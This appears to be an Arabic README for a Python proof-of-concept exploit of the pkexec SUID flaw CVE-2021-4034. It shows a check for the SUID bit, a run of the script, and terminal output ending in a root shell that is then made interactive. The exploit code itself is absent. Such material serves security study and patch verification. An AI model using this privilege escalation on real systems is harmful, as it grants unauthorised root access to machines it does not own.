
استغلال Python لإثبات المفهوم لـ CVE-2021-4034 الذي يسيء استخدام ثنائي SUID pkexec لتصعيد الامتيازات وفتح قشرة جذر تفاعلية دون بيانات اعتماد.
CVE-2021-4034 (pkexec) يستغل هذا السكربت المكتوب بلغة بايثون الثغرة الموجودة في الملف pkexec للحصول على صلاحيات الجذر (root) دون الحاجة إلى تقديم بيانات الاعتماد.
· يتحقق مما إذا كان الملف الثنائي يمتلك صلاحيات SUID، وفي هذه الحالة يكون الملف ضعيفًا.
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
· يقوم بتشغيل الأداة الاستغلالية (exploit) للحصول على صلاحيات الجذر (root)، وفي هذه الحالة يكفي تشغيلها باستخدام Python3، وبعد الانتهاء ستحصل على قشرة (shell) بصلاحيات الجذر.
usuario@gatogamer $ python3 CVE-2021-4034.py
[+] بدء الأداة الاستغلالية
[+] تم الانتهاء من الأداة الاستغلالية
# whoami
root
#
· كإضافة، يمكنك تغيير قيمة TERM إلى 'xterm' أو 'xterm-256color' للحصول على مظهر أفضل، بالإضافة إلى تشغيل قشرة مختلفة مثل 'bash' أو 'zsh'، والآن لدينا قشرة تفاعلية بالكامل.
# export TERM=xterm-256color
# zsh
root@gatogamer $